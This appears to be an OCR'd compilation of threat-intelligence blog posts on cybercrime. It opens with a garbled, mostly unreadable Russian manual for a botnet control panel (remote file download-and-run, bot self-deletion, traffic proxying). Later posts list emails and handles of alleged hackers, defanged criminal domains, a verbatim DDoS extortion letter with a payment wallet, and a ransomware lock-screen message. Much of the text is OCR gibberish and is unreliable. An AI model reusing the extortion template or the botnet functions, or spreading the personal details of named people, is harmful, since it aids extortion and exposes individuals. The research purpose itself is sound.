SET path ~ Mony ate Daiin ¢ Gota; path — nyte « dbaleny wa Gote 

PUT path ~ NEpeAaTe alin Gory c yaRaHweM MyTH PaRMeUURHetA Ht HME Man | modules | Tratticemert | Connections | Settings | Totah 64 
DELBOT * YAaMeT GOTa # BOR ETO CNB Abi C Mae: 


DELBOTPROT ~ yAaneth GoTa ¢ HOBOSMOx HOC Ted NOB TODHON yCTaH0EKn 
KOMa ab MOryT OTNDSENeTRCA Tacre Croxy GoTos (or. penzen <Cmecx Goran. Covnrms). 
Fpl NOHMEp HCNOPR.OBaHiKA KOMaNgE: >TO OTNpanKa FOMaMge: PING crecey Gotce 
PeoynetaT BeNOMeHtA ACToreH Get. “apes CexyMay-Ape @ BHA OTReTa CMD_OK & 
Nocne AMest KOROHMe Crvcka GoToe, HOTODaa HaMeHAT CROW aaronoBoK Ha Response. 


Man | Moddes | Trafficexpert | Conmections | Settings | Krew parevaters, prec (Send), ten you wil be athed fer local fe far sand and ran on mernote side 


‘Sample: RIUM fratal (stort 


ae 


aw “ [> Ante send this commnand te mew bets | : | 
aS = 
a s 
Acorn 3 
a od ou v 
‘ 
& =" Sets 2 
es s * 
wo 10 Cuteer « 
Lau od 
» 
= 
=~ 


yXGRSTe NOCME KOMEN ERY Heobx0 gree ef MapaMerpe: 4 Haat) —— cI 
NOCN® “erO KIMOHT NOMDOCHT YKARaTS NOKAM Heat Dain Ana OTNDARHH @CNM >TO HYD. 


CYWIRCTRYOT BORMOOKHOC Te amTONE TNO KON OTNDSEIO. HOMAHA BCEM HOGkIM NORENaCuMMCA ® CrecKe Gotam. flna sToro cnyemT dna Auto send this command to new bots 
ORHO KOMMGH A SDGHUT THORNE HCTODIGO OTMDSENGHHEe KOMEN A, ANA MDOCMOTPS MPS Abel YUM MOIKHO BOCNOMSO8S TEC” CIPONKEMY KNSEHAT Pe! BEODX.6HvG NO KHONMaMY B OX 
Echt FOMEHAG HE NDEAWECTBYET CHe@ON <TOwGe, To GoT paccmatpreser CrpoKy KaK http url agoec # PeiTSeTCa Sarpyiet> (badin C STOrO aapeca # BeMOMeth. Mocne yaaeoro 
SaNyCKS CKaueHHOro Qalins Kent Tanke Nonyet oreet CMD_OK 

Nocne penoneers rOMaN ae GET knivent nonyuaer yenenm dadin c Gota + OTXpemaeT AHaNOTOnOe CFO C BANPOCOM MYTH ANA CONPaMEatA MEMERTOrO thadina. 
Komataa .PUT gedicteyet HaoGopoT — palin nepeaaeTcs ¢ KnMexTa 4 NpocTO paameuiaencs Ha GoTe no yKasaHomy nyt. Nocne menonHeHie KnMeHT NONy4aeT OT Gota CMD_OK 
DELBOT sanycraer pews Camoyrerrromerita GoTa, NpoHceaanT YHHUTONTeH8e BanOR DeECTpa, COPEHCoe, ADaleepoe, dainoe 4 BOCCTaHOENerHe TOK BxOAa Windows API 
DELBOTPROT wancrwee Komane .DELBOT aa ucKTO4eHHEM Toro, WTO >Ta HOMaiaAa MOgiebeapipyeT G1CTemy Tarim OGpa90m, 4TO NosTOpMas yCTaMomKa GoTa ye HemceMONOe. 
Komayaa .REBOOT nporaeoant Heme aneweno Nepesarpyary CHCTOMee 
None Note / Response mexaetca aeTOMaTHusOa pet Mpesies OTBETOR KOMEHA, BEGOBS OKHS DE AIK THPOBaHIA KOMMEHTapIER, M0 EDY MH) = Noe Knee MO Baronoexy Crondua. 


[3] 


Knnent. Traffic Expert. 


B pexvee COMOaDeGUVet BOIMOMEH NepexBat Tpadbuxa. fine sToro Coypent exnaye Traffic Expert. Boaeneorcs Cregyoupe Brae! hades | 


Sended + Tpadee, OT Dae nares NpHnooerier 
algal nn apt hrtniy AS al 
ae ee 


GETs ~ OTTPanneneeue aanpoce: cpa (GET xomaga http) 

POSTs ~ OTTPARNeHHele HabO pe! AMHR C HCNOTIORAMMEM HDMAH Al POST 
Hag HM UMCNODOe Sa UeHiNegretes Nene emp umem esx Aprettet. unctKa Gytbepa. 
Pewoeen: HEX- wecteaguarep east, TEXT -\rerct, WRAP - reect c meperocom crpox 


eS o sites] 
on EE ne 

| —_s JC ne 1 
ee telected |[ ro see test | 


am oon (TS Ts a 


Use module only with this Bot ID = - Saepernite NOMnceteee Sa Gorom 
Use module only with this Country - saepervme Npvinoeeee aa crparod 
Moree STOrO BOSMORHO GUYe H DYSHOS HOMeHiree NDaBHN COmcipbeeaann Npnowernst 
Baxnagea Modules cogepaa Cimcok mpamwn © cbopmarte: 

Module ~ Veea NpNcocees (Kax @ CTAMAApTHOM AMCneT 4epe aaaay) 
Rule > NpaeMinD 

BotHash =~ pueare+eii hog Gora. (Home ayeTCa Ana NpaeHn M KOMMeHTapee) 
Countries =~ crwcox CIpaet apes npoGen, /Puemp: US CA AU PMO IN 
B npowecce pabote: MPH NepemmaTe Owepepegnoro Sanpoca Ha COBAveNe KneNT 
Ovauana MpOcMaTpemaer CNMCOK Mpamin. Ecn GemonuCUee aanpOc MpHMnoKeee 
alyero 8 none Modules, To KneaHT Haxo4HT CooTRETCRYKAUerO GoTa 4 MCNOMeayeT ero 
ana AaHOrO WOHHeKTa. Eon yrasaeedt Gor He HaMeH, TO B CIMKHE COB shed? 
ROReKMET CMipTRMe KOHMeXT C ID =O, “apes xDTOpeit Tpadaik He NDOXOAMT 4 CeTeRcH 


TORAD 18 BPEMA OAHOH Ceccie: 4 MCOeT Garth HaaMa4eM BMocnesc te Apyromy Gory. 


Npaeune exnousor 8 cota sea BapwaHta + 
Allow only this * PROPS TE TONED ... 
Allow any, except - paspewnth ec, pore... 


QnA cosgareet Mpa HECO xo 4 Sanoniets None Module name, Rule 4 agro 10 
Apyx Moned: BotHash un« Countries list. Taam cGpascm npvevaxe npuncemest MoxeT 
Ocywectenanca mio kK onpegenessomy Goty, mufo « cnucxy CTpay. BO BTOPOM Cnyuae 
VOnOMeayeTCs Cryaaieent BeHop C YWITOM erm Tpa, OCn4 OM aKTHEEH. Haniune @ CresCKe 
axverenr COBAHEHH CTPOK C ID=0 CBHASTEMRCTBY®T 0 HEBOSMOKKHOCTH BRNONHTT 
NPAEMNO COKOKp Guyer MDMnOKEe: NGO HEOGeDgMorO GoTa HET 8 CHNeiee, NuGo HET 
Heo mogvébe CTpaK. 
Npw eeGope npamina 49 CnMcKa ero 4a}eeue NONAAwOT © NONs Ana pegaKTHpowarets. 
Herne sce [Add de emoncer acGeanerve roseune vo Tae 

~ YAANEHMe BeiGpaHnoro Npamina, - Cex. 


Tov Moreira cosaaTe HOsOe MpasHmo c Module name yxe CyuweCTeyxuueM @ crc 
NPSEHN ~ BLLseTCA NPBA NPE AeHHe C BONPOCOM O Nepesanncn. 


QUrHO Npwencoreeiee MONET HMETS TON OkHO Npapn | 


fans cotetetnn edecieel nessa eeaunioonel 
B AaHHOM pexniMe BCe COsQanaeMee NDMMOWEHtAM TCP-CORAMHEHI NOPEMRATREeOTCA 
KNVMBHTOM  OTOOpaxKmOTCa 8 HOrHEM oFMe, None ID cogepyod Homep Gora, 
Mcnomsayenero Aaa Amecro weaee. Beapay coomacerapenie wequerh Aenea Gar 


[OA WEXASO HORT HORONEKTO MEINET HCTOURIOUSRACA HODDA WME CORIO COE 
Penom Bediopa cnyualeoro Goa BXMOUSETCA 4 BRTMOUSSTCA HaxaTwen eon [RAND] 
B AAHHOM PenKve8 COMARARME EHOUZERI NoNENCITeHCR CORAieaets OYAYT NPOND AMT: 
wopes cryuaine seiGpaeoro Gota u3 Cnvcxa, Np TOM perTemaeTCA COCTORHe ure tpa, 
Whe oToGpaxcaceaue Ha pave Goth He Oy ayT HCNOMSORaTECA AMA COP AHHeHIet 
HVOHEG OFHO MOKASRIBSET COICO BKTretmibis C Omg earo eels 


SIIALALASSSS 


uibcioel Santiege i Geccommanenenecir en sanecen: Covscia ncanmanene Raita 


Bow aarnaaxn Settings 4axOAaTCa Apa Nona: 
jude modules ~ CMCOK MOAYNEH NOANeKaUNe COMEDeNUM 
Exchade modules * CVCOK HXnOUusHes, (MiMeHa MOAy Nev Kax 6 AMCNeTuape sagau) 


B CnpMae PYWHORO PRAAKTHDOBSHINA HAC TPOeK Ha SaKNaAKe Gettings HeoGxogvemo Haan 
Hronry Apply (Beepxy) uroter naneneree ec tynan 68 Gany HeMeAneHno, 
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The following is a brief summary of all of my posts at ZDNet’s [1]Zero Day for October. 


You can also go through [2]previous summaries, as well as subscribe to my [3]personal 
RSS feed or [4]Zero Day’s main feed. 


Notable articles include: [5]Does software piracy lead to higher malware infection rates? 
and [6]New LoroBot ransomware encrypts files, demands $100 for decryption. 


01. [7]MS Security Essentials test shows 98 % detection rate for 545k malware sam- 
ples 

02. [8]Weak passwords dominate statistics for Hotmail’s phishing scheme leak 
03. [9]Click fraud facilitating Bahama botnet steals ad revenue from Google 
04. [10]New Koobface campaign spoofs Adobe’s Flash updater 

05. [11]Does software piracy lead to higher malware infection rates? 

06. [12]Commonwealth fined $100k for not mandating antivirus software 

07. [13]’Evil Maid’ USB stick attack keylogs TrueCrypt passphrases 

08. [14]Fake ’Conflicker.B Infection Alert’ spam campaign drops scareware 

09. [15]Gawker Media tricked into featuring malicious Suzuki ads 

10. [16]New LoroBot ransomware encrypts files, demands $100 for decryption 
11. [17]Spooky Halloween - scareware or crimeware? 

12. [18]Phishing experiment sneaks through all anti-spam filters 


This post has been reproduced from [19]Dancho Danchev’s blog. 


. http: //blogs.zdnet.com/securit 


1 

2. http: //ddanchev. blogspot .com/2009/10/summarizing-zero-days-posts-for.html 
3. http: //updates.zdnet.com/tags/danchot+danchev. htm1?t=0&s=0é0=1&émode=rss 

4. http: //feeds. feedburner . com/zdnet/security 

5. http: //blogs.zdnet . com/security/7p=4605 
6 
7 
8 
9 


. http://blogs.zdnet .com/security/?p=4512 


. http: //blogs.zdnet . com/security/?p=4549 
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HeRDTOPeN ONEpaLVE KIM@HT MOET BENONHATS C fpynnod Goroe. 
Ana ceigenenies Tpynre: Mow HONOne CBA Te Crea yousse KOMGveaupn | 
~ apGannerie © rpynny 
~ weeps OTHE TK 


Ctrl + mean 


Shift + aux 
Alt + 


Knnent. 


torn} 
Bote, KOA ALO © TPYNNy OTMOSBOTCA BMAeNeHauM MoneM LD 
None Note xpaHiT NOM sORaTEMCHAA TeKCT (KOMMEHTapHi) 


ORGREEE OLE 

pn an BEBEE~22 

al al gl ss) sll gl lS pe 5 
a et ees 9-7-4 Fe 


sctiveuganzedtvden.ds 


+ 


OMMONTapHe TOMLKD Ha >TOT Coane patiotes 


Hacatwe Dk and Save} Coxpannet Kovmentagn ecex GoTos He AMOK 4 aeTOMaTHUECKH 
BOCCTAHSE MESS T NPM CREA POUIEM CBSHCe PabOTe! KNMEHTa. 
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Kaneunr. Hayano. MogKniovenne Kk cepsepy. Cnucox 6oTos, dunttp. 


Npurownenue [XSOX] Client (@ gareetuem npocto Suave") paSotaer B WinG2 2K/NT/xP. Bemonnnet pease: KnMeNTa Ceperca, NoKarenoro socks » concudercaTope. 
Dina nauane paGote: Heofixoaver 4 ACCTaTOWIO yrabeth IP-aspec Hint ZOMeHHOe HeUR CEPBEpa B NEBOM BepaHeM yrny OFS HW HioKaTS HHOnKy [Connect | / 
Aanee ceogre Login. Password 1 vaxxveem OK. Mocne ycnewnoro norvune arent yCcTanserme@aet uadposaeadit Teen K Copeepy H * T CMCOK axtvmrenx GoTos. 
Ha >TOM >Tane Talore Kre@eT NomysaeT uxpopeaupet NO axayHTy 

Account ~ 4a 8 CoCTEMe (Login) 

Level * YROSEHe Npvennend 

time teft ~ OCTERUUBECA BPEMA PRSOTe: C TOMOCTRO £0 CeKyHA 1 
Comox Goroe oroGpaxact Toren some CHMnaiecmex Soros # NONyuseT oT Cepmepa | py 
veDOpoalno NO Hn COCTOESO & Peantalee. 


Country, City, Sate - pee, ropan, ett - Aree, Non~ereee MO Geo fam PoLocation ~ 
ver 


> Bepow HcMOmayeNOro for-codra 
Ld + P-aapet nea roropes Gor Monat ma Copmep, TO ecte ero ereusesi M1) 
upTime- epena © seetyTax 6 Onnaiee, (nopeTmocte=Seem. Moone 1195 nner | days, 2days nw Ta) Use Selected | Lacie | sm test | 
» « CRULAPP0s7 CODERDOM HOMED, He reteeeCUT ICN He fOMeNt Cocos, On ee Bot _ID. 
Note - Pom.onereone Noreeuaren / Bosowen power Response - omer ¢ DeayreTaTor onepeures Man | modues | Trafficemert | Connections | Settings | 


LI Lis 
a XSOX 


_—_— = — —E 
KHonxa [Use Filter] NpPedHasHauena 4a BO UeHitA Deca une Tpauies CWExe GoTOe. Now 68 Haxanat none Total 6yaet oropaxate dire tposaiHoe 1 otuiee wHono GoToe. 


Qna copmupoeen crucca NO OAMOMY He NOMEN MecSxaqueo KMOO Te NOBON KHOKDM MMRUM Ma 2arOnOeKe COOTRETCTRCUUErO cronGya. 


2. https: //blogger . googleusercontent . com/img/b/R29vZ2x1/AVVXsEhQBYsOy_kfiV7iTOfYSAfoGXwBFak IH5dnb-CjOor0Xg21f 
3. https: //blogger. googleusercontent. con/ing/b/R20v22x1/AVwXsEhgolixes2gFIRISgV2S220on2PvAoDOynB0_cEkjndoZpfUl 
5, lctpe:/ blogger. googleusercontent.con/ing/b/R29v22x1 /AVwEsEin| FrqQVF FUVa utably2-GEzx08 ur vfiyGO0BGnth 
6. https: //blogger . googleusercontent . com/img/b/R29VZ2x1/AVVXsE jHaX-9101mXAh j3F ekD JSOOkmReSk1 qOCNVTPx3C9EX8CNI 


7q50xg-ibjwKT5yZp8RHHDRi 9KCAzMaaEGqONTUtbI 1K6MkyTEdPO 
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19.5.4 Hacker Database (2023-05-07 15:37) 


[1] 
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| would like to take the time and effort and let you know about my latest project which is called 
[2]Hacker Database. Obtain access [3]here. 


Sample screenshots: 
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[5] 


[6] 


a> 


Anonymous Bulgaria 


Dead. Zone@att.net 
Faridmahdavi90@ yahoo.com 


pashe kosh8@yahoo.com 
Pashekosh8@gmail.com 
sajjad13and11@yahoo.com 
sajjad13and11@yahoo.com 


nic. in@live.com 
support@multivpn. info 
info@paterva.com 
h.sk33py@y?mail.com 
adit@cyberserices.cam 
petani_ nyengar_nyengiv@yahoo.com 
info@petaniweb.com 
petaniweb@ yahoo.com 
petaniweb@hotmail.com 
kelinci_on2001@yahoo.com 
ilsearle@hotmail.com 
hmei?@yahoo.com 
nicedredm@yahoo.com 
hellfirez65@ yahoo.com 


Demonn@mail.ru 


Aegrasi@flashmail.com 
rabbit_on2001@yahoo.com 


jjagermonsterS9@hotmail.com 
mOstagim@gmail.com 

mtn9? hacker@yahoo.com 
raminshahkar?3@ yahoo.com 
Faghat_be_khatere tob000@yahoo.com 
pashe kosh9@yahoo.com 
Mr. Skitt3n@att. net 
4rM4n@att.net 
ZEROCoOL_H@yahoo.com 
mehdyO07@hotmail.fr 
Skitt3n@yahoo.cam 
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shekaf Security Tearn 

Dark Soul Security Team 

Amn pardazesh kharazmi 

Amn Pardazesh Kharazmi 

ITSec Tear 

HackPhreak Group 

Sub? Trojan Horse Hacking Group 
Pinoy Vendetta Members 

Power Through Resistance Hacking Group 
Anonymous Indonesia 

Sun Army 

Danger Security Team 


IDH Security Team 

Iran Cyber Army 2012/2013 

lranhack Security Team 

NOPO Digital Security Tearn 

lranian Datacoders Security Tearn 

Iran Security Team a.k.a SEPANTA Team 
lran Black Hats Tearn 

Delta Hacking Security Team 
Ashiyane Digital Security Team 
Digital Boys Underground Team 
DiaGram a.k.a. Advisor Security Team 
Irlst Security Tearn 

Mafia Hacking Tearn 

Bastan Security Tear 


[7] EagleSoft Hacking Group 


Team 
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IR Anonymous 
nima.perl 

Bal H4ck3r 
alimp5 

MR. M@i!d 
Linx86 
marshal3333 
MOri 
D4rkCOd3 
Skitt3r 
BigB4nG 

Mr. XHat 
mehrdadab? 
Net.EditOr 
Black King 
alireaza_hammer 
Pashe Kosh 
Sajjad13and11 
D4GHOON 
MIDI@. HACKER 
Bl4ck M4n 
Dead. Zone 
Beni Vanda 
Silent 
Tak.Fanar 

Mr. Zero 
COdex 

Arnilr 

lr. Soldier 
Alireza6b6 


Nima Danger 
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Sample visualizations produced using the database in GraphML format: 


1. hietps://blogger .googleusercontent .con/ing/b/R09vZ2x1 /AVWLsEg6itpexMI0SC InCSdHdakOs0ci5 jpE0b812)IGOLALGrO 
2. https: //cybercrime-maltego-graph.org/ 

ttps://cybercrime-maltego- graph. org/introducing-maltego-and-graphm1- compat ible-live-and-historical-hack 
4, https: //blogger .googleusercontent.con/ing/b/R2DvZ2x1 /AV Xe gENOWnSNTSvrSWfpToVUWCLVLKENZev1¥~AcygC04j nS 
5, https: //blogger. googleuser content. con/ing/b/R26VZ2x1 /AVXBEjpiVTPUDQbs GGBOaPObKINDO} 1S3FOcabMFngg Wipes 
6. https: //blogger. googleuser content. con/ing/b/R20VZ2x1 /AVXsEghDSYCtu NGI gOwliqtzGezPyVVsCSTASTRTSFEPZDHin3¥@ 
"https: / blogger. oogleusercomtent.con/ ing/b/R29v22e1/AVvKsE jbvnkcOB0s2UUEGK_vTY-9-£eISBATIfefHixev0QH0_p 
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19.5.5 Happy Holidays From The (Not) Republic of Bulgaria - An Analysis - Part Five 
(2023-05-08 18:25) 


[1]Dipshit. The [2]deepest of them all. 


fe] NEB vinic 
COUMATHA KAMN AHWR 


NA3M DETETO 
B UHTEPHET 


B MHTEPHET 


NASW PETETO NASM DETETO 


ew TEOHeEr 


detetovinternet.bg 


al 3ACTPAXOBATESIHA KOMNAHMA 


AKTUBHATA CUrYPHOCT 


detetovinternet.bg nASM LETETO 


B UHTEPHET 
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[5] 
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5.11.2 Pricing Scheme for a DDoS Extortion Attack (2009-11-03 10:58) 


P Satu festtme Lact ome 


free MOBOOSORI 32090108 08 IT 
free 2080108004810 3080108 0817 2 


Free 2000-01.08063212 2000-0t.09 08-97-20 


free MOSS ORC SN 308-018 OB IT 2 
£ Been letra free AROS OO OI 
4 Hoc Free 2008-01.08080213 200-0108 08.37.20 


Ge Create new tak 


Hostf port} Bots 


Gh Add Task SPAM 


& 
tf 
t 


File: g 
Linnt mal on one bot Ps 


Keys for subject (apiit irs 
pace) 


Pop ai 


Gh AGd Template bor SPAM Tank 
Senders List 

Name Corrgiate: 
Servers List 


Terrolre qwel 


« ¢ %||%] 
é 
B 
* 


Actve 


D Sererate ntiects } |p” Carcet_ | 


With the average price for a DDoS attack on demand decreasing due to the evident over-supply 
of malware infected hosts, it should be fairly logical to assume that the "on demand DDoS" 
business model run by the cybercriminals performing such services is blossoming. 


Interestingly, what used to be a group that was exclusively specializing in DDoS attacks, 
is today’s cybercrime enterprise "[1]vertically integrating" in order to occupy as many under- 
ground market segments as possible, all of which originally developed thanks to the "malicious 
economies of scale" ([2]massive SQL injections through [3]search engines’ reconnaissance, 
[4]standardizing the social engineering process, the [5]money mule recruitment process, 
[6]diversifying the standardized and well proven propagation/infection vectors etc.) offered 
by a botnet. 


What if their DDoS for hire business model is experiencing a decline? Would [7]penetra- 
tion pricing save them? What if they start enforcing a [8]differentiated pricing model for their 
services through DDoS extortion? 


Let’s discuss one of those groups that’s been actively attempting to extort money from 
Russian web sites since the middle of this summer. From penalty fees, to 30 % discount if they 
want to request DDoS for hire against their competitors, a discount only available if they’ve 
actually paid the 10,000 rubles monthly extortion fee at the first place - this gang is also 
including links to the web sites of Russian’s Federal Security Service (FSB) and Russia’s Min- 
istry of the Interior stating "in order to make it easy for the victims to contact law enforcement". 


Sample DDOS extortion letter: 
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\\ MM 


3ACTPAXOBATESIHA KOMNAHMA 


detetovinternet.bg NASH AETETO 


B UHTEPHET 


[6] 
27663 


Stay tuned! 


1. https://linkedin.com/in/yavorkolev 

2. https://youtu.be/KtGFByAJRQQ 

3. https://blogger. googleusercontent.com/img/a/AVvXsEjxMuK7 1REGwmj X99RgzXAy4wYdfDx42QBtrEtm_pEd5AP5TcmikOsSLc 
R_q8w50QnRcW-- j JDYH43nQXTyTAa__d5jqs4Wwix50e9cr5D70-Ky 

4. https: //blogger. googleusercontent.com/img/a/AVvXsEi45516e jzXCcBZX5vpR_D2vMudSVF9B6uzZCBoQLz4i0zgGS9 1WLYMPJ 
jxDOdhYxA4oXTs2hx8WHKt 5LSGQiP- aWekG5VnfIK2D6_XbZQ1SSkp 

5. https://blogger .googleusercontent .com/img/a/AVVXsEhA1M3s_4XBe3MrIdxRo1Y-cTQScjH7u5K_60g_K6XdGMhu_3eNsHCNo- 
QiPé6dIt1lWtaBeksqJakKTYqL7Cg00IRbBRuf t OndQUYI7YayBOoMs9D 

6. https: //blogger. googleusercontent.com/img/a/AVvXsEilavC3NL_HFtA3MvMF1VEam1SrVqZ89C7 Jyy1aQrJc8RthKuIthkkM33 
kZG77Gr1G4wj IgkQW1s4GqM4wFbQQ1bWaij 7G8DUmrfEBiRMC1_Wio 
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19.5.6 Exposing Hacking Team GhostSec - An Analysis (2023-05-20 12:03) 


[1] 


In this post I'll profile Hacking Team GhostSec and I'll provide all the relevant and necessary 
loCs (Indicators of Compromise) including all the relevant personally identifiable information 
in terms of assisting U.S Law Enforcement and the U.S Intelligence Community on its way to 
properly track down and monitor and prosecute the cybercriminals behind these campaigns. 


Personal Photos: 


[2] 
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[3] 
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Related loCs and personally identifiable information for GhostSec: 
Official Web Site URL: hxxp://opiceisis.strangled.net 

Official Web Site URL: hxxp://81.4.124.11/index.php 

Official Web Site URL: hxxp://pst.klgrth.io 

Official Group’s Twitter account: hxxp://twitter.com/ghost _s3curity 
Official Group’s Telegram account: hxxp://t.me/GhostSecc 

Official Group’s Medium account: hxxp://medium.com/@OfficialGhos tSec 
Official Group’s Web Site URL: hxxp://ghostsec-team.org 

Official Group’s Web Site URL: hxxp://ghostsecret-team.blogspot.com 
Official Group’s Email Address Account: ghostsecteam.org@gmail.com 
Stay tuned! 
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1. 
2, hetpe:/ blogger .googlevser content .con/ing/+/20v2Z2n1/AVwXebgrO-LPZxubEP EF 4nCXSCut3e7FIStavze2Rctal2D-u0-T 
3, https: //blogger.googleusercontent .con/ing//R29vZ2x1 /AVwKsEiGO0cViirrGVSa7FOVBYI~Xik4znySGFOWYph_TAPInic 


19.5.7 Exposing The "Denis Gennadievich Kulkov" a.k.a 
Kreenjo/Nordex/Nordexin/Try2Check Cybercriminal Enterprise - An Anal- 
ysis (2023-05-20 12:04) 


[1] 


Who would have thought? The U.S Secret Service is currently offering $10M reward for [2]Denis 
Gennadievich Kulkov also known as Kreenjo/Nordex/Nordexin who’s particularly famous for 
running the infamous Try2Check credit card checking cybercriminal enterprise. 


What’s so special about this individual is the fact that he’s also been running a well known 
money mule recruitment operation since 2016 using the World Issuer LLC money mule re- 
cruitment franchise based on my research using public sources where we've got the actual 
hxxp://worldissuer[.]biz domain registered using identical domain registration information such 
as for instance hxxp://try2services[.]Jcm including several other domains such as for instance 
hxxp://dam-shipping[.]Jcom and hxxp://cloudnsman[.Jorg and the following domain which is 
hxxp://elementconstructiongroup[.]compan y. 


Among the actual domains known to be part of the Try2Check cybercriminals enterprise include: 
hxxp://try2services[.]pm 

hxxp://try2services[.]Jcm 

hxxp://try2services[.]vc 
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[3] 


® 


public-dns.us 


3 


16cda323189d8eba4248c0a2f5ad0déf 


including the following domain: 


hxxp://just-buy[. Jit 


including the following two ICQ numbers 855377 and 555724 and let’s don’t forget his personal 
email address accounts obtained using public sources which are polkas@bk.ru nordexin@ya.ru 


[4] 
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and it doesn’t get any better than this as we’ve got a pretty good and informative domain port- 
folio registered by the same individual based on public information sharing the same domain 
registration details such as for instance hxxp://worldissuer[.]biz which actually are: 


[5] 


sm, sa, sm. ar 
4 wa wa Sa 
dam-shipping.com cloudnsman.org worldissuer.biz try2services.cm 


hxxp://cloud-mine[.]me 
hxxp://gpucloud[.]org 
hxxp://hyperhost[. Jinfo 
hxxp://miservers[. ]info 
hxxp://carterdns[.]com 
hxxp://reshipping[.]us 
hxxp://keyserv[.]org 
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hxxp://antmining[.]biz 


hxxp://investmentauditor[.]com 


hxxp://sunnylogistics[.]us 


hxxp://try2services[.]Jcm 


hxxp://greatwallhost[.]net 


hxxp://jaqjckugrfffqa[.]Jcom 


hxxp://numberoneforyoul[.]net 


hxxp://getprofitnow/[. ]biz 


hxxp://avsdefender[.]com 


hxxp://spyware-defender[.]com 


hxxp://beta-dns[.]net 


hxxp://mpm-profit-method[.]Jcom 


hxxp://public-dns[.Jus - [6]related including [7]this 


hxxp://adobe-update[.]net - Email: krownymaradonna@onionmail.org related domains known 
to have been involved in the campaign include - hxxp://amazon-clouds[.]com; hxxp://microsoft- 
clouds[.]net; hxxp://telenet-cloud[.]Jcom; hxxp://vmware-update[.]com 


hxxp://kwitri[.]net 


hxxp://dcm-trade[.]Jcom 


hxxp://karoospin[.]biz 


hxxp://fastvps[.]biz 
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sunnylogistics.us 


alex@phoenixtecsupport.info 


© © 


cancan.us dworaktrading.us transferbucks.us 
a Si 7 
18) ©) 
J) 
tiltshop.us whatsappbusiness.us 


Stay tuned! 


1 
2, tape: aww, secretearvice, gov/invertigation/acetwant i/o 
3. hreps://blogger. googleuser content. con/ing//R20v22x1/AWEsES IDE y4G4Y7 jigeplVDNILRAyo_y07VicVaVEASESuSE¥oa 


S 


_ hetpa://blogger googleuser content .con/ing/b/R29v22x)/AV aE valnjhOl yhdARsF¥5Tpyi SMB vaOeTOITgTIOVT_26yat 
5. https://blogger . googleusercontent . com/img/b/R29vZ2x1/AVVXsEi28SwA4 j vidHpsMLDvTUdSNwZ-H900yG821Z-COYX16QwAK 


6. https: //cloudsek.com/threatintelligence/carbanak-fin7-crime-gang-threat-intel-advisor 


7. https://cyware.com/blog/carbanak- insights- into-the-billion-dollar-bank-security-threat-— 284d 


8. https://blogger . googleusercontent . com/img/b/R29vZ2x1/AVvXsEjKMqYhgUiGAeFbQZEnnYAbQD5mCh3zi9-TcqwbeuGbH53- 


am 0pdCkqYS-Mm5RtFXK3bLy 6WcBA0i0ft cN- ySaVbeZQJER1tQ6A91 
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"Hello. If you want to continue having your site operational, you must pay us 10 000 rubles 
monthly. Attention! Starting as of DATE your site will be a subject to a DDoS attack. Your site 
will remain unavailable until you pay us. 


The first attack will involve 2,000 bots. If you contact the companies involved in the 
protection of DDoS-attacks and they begin to block our bots, we will increase the number of 
bots to 50 000, and the protection of 50 000 bots is very, very expensive. 


1-st payment (10 000 rubles) Must be made no later than DATE. All subsequent payments (10 
000 rubles) Must be committed no later than 31 (30) day of each month starting from August 
31. Late payment penalties will be charged 100 % for each day of delay. 


For example, if you do not have time to make payment on the last day of the month, 
then 1 day of you will have to pay a fine 100 %, for instance 20 000 rubles. If you pay only 
the 2 nd date of the month, it will be for 30 000 rubles etc. Please pay on time, and then the 
initial 10 000 rubles offer will not change. Penalty fees apply to your first payment - no later 
than DATE" 


You will also receive several bonuses. 

1. 30 % discount if you request DDoS attack on your competitors/enemies. Fair market value 
ddos attacks a simple site is about $ 100 per night, for you it will cost only 70 $ per day. 

2. If we turn to your competitors / enemies, to make an attack on your site, then we deny them. 


Payment must be done on our purse Yandex-money number 41001474323733. Every 
month the number will be a new purse, be careful. About how to use Yandex-money read 
on www.money.yandex.ru. If you want to apply to law enforcement agencies, we will not 
discourage you. We even give you their contacts: www.fsb.ru, www.mvd.ru" 


It’s also worth pointing out that a huge number of "boutique vendors" of DDoS services 
remain reluctant to initiate DDoS attacks against government or political parties, in an 
attempt to stay beneath the radar. This mentality prompted the inevitable development of 
"aggregate-and-forget" type of botnets exclusively aggregated for customer-tailored proposi- 
tions who would inevitably get detected, shut down, but end up harder to trace back to the 
original source compared to a situation where they would be DDoS the requested high-profile 
target from the very same botnet that is closely monitored by the security community. 


The future of DDoS extortion attacks, however, looks a bit grey due the numerous mon- 
etization models that cybercriminals developed - for instance ransomware, which attempts 
to scale by extorting significant amounts of money from thousands of infected users in an 
automated and much more efficient way than the now old-fashioned DDoS extortion model. 


Related posts: 

[9]Botnet Communication Platforms 

[10]Custom DDoS Capabilities Within a Malware 

[11]A New DDoS Malware Kit in the Wild 

[12]Botnet on Demand Service 

[13]The DDoS Attack Against CNN.com 

[14]A Botnet Master's To-Do List 

[15]Custom DDoS Attacks Within Popular Malware Diversifying 
[16]Using Market Forces to Disrupt Botnets 
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19.6 June 


19.6.1 The Ransomware "Epidemic" - Or How To Strike Back? (2023-06-02 10:19) 


[1] 


This operating system is locked due to the violation of the federal laws of 
the United States of America! (Article 1, Section 8, Clause 8; Article 202; 
Article 210 of the Criminal Code of U.S.A. provides for a deprivation of 
liberty for four to twelve years.) 

Following violations were detected: 

Your IP address was used to visit websites containing pornography, child 
pornography, zoophilia and child abuse. Your computer also contains 
video files with pornographic content, elements of violence and child 
pornography! Spam-messages with terrorist motives were also sent from 
your computer. 

This computer lock is aimed to stop your illegal activity. 


You have 72 hours to pay the fine, otherwise you will be arrested. 


You must pay the fine through 

To pay the fine, you should enter the digits resulting code, which is 
located on the back of your in the payment form and press 
OK (if you have several codes, enter them one after the other and press 


Not only did we live to see it we’re actually living and taking actions one way or another to 
see it and yes it’s the ransomware "epidemic" that I’m referring to and which I'll try to expose 
in this post by not only providing the typical for me technical details and related action and 
response initiatives that I’ve launched in the process but also provide a relevant and in-depth 
understanding of the modern concept greatly inspired by a free resources which | came across 
to on Twitter today namely - [2]Ransomchats which is outstanding and almost unbelievable 
initiative that offers an in-depth peek inside the supposedly secret chat conversations between 
ransomware "customer support" and the multi-billion dollar victim which in this case is a reality. 


Greatly inspired by the general availability of this free resource I’ve decided to dig a little 
bit deeper inside these publicly accessible of what appears to be proprietary conversations 
using a popular tool which I’m using to cluster and produce graphs of current and ongoing 
conversations between the bad guys that | come across to and provide my point of view on 
a surreal problem that’s being fought with the wrong resources and technical means to begin 
with and further elaborate and actually share the results of a sample experiment that | did on 
the topic in basically my spare time. 


Sample graphs based on the recently released communication courtesy of the Ransomchats 
project: 
